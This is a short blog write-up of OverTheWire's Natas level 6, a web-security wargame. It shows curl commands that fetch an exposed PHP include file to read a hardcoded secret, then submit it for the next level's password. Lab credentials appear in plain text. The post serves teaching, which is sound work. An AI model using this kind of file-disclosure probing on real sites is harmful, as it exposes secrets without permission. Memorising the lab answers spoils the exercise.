Home Natas [Level 6] - Overthewire
Post
Cancel

Natas [Level 6] - Overthewire

Posted Jan 22, 2023 Updated Aug 6, 2024
Natas teaches the basics of serverside web-security.
Natas teaches the basics of serverside web-security.
By Dat Vu 2k
1 min read

Username: natas6
Password: fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR
URL: http://natas6.natas.labs.overthewire.org

Alright, for this level i have to enter a secret, and the query should return the password… hopefully! Let ‘s go ahead and click View sourcedode and we should get the below PHP script.

1
2
3
4
5
6
7
8
9
10
11
12

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

I look include is /includes/secret.inc so i will check it.

1

curl -XGET -u natas6:fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR  http://natas6.natas.labs.overthewire.org/includes/secret.inc

==> And results

1
2
3

<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Another PHP script, with the secret code i need, so back and query as follow

1

curl -XPOST -u natas6:fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR -d "secret=FOEIUWGHFEEUHOFUOIU" -d "submit=" http://natas6.natas.labs.overthewire.org/

Alright, i got the password! Moving on to level 7!

==> CTF: { natas7:jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr }

CTF-AnonOps, Natas
overthewire natas
This post is licensed under CC BY 4.0 by the author.
Recently Updated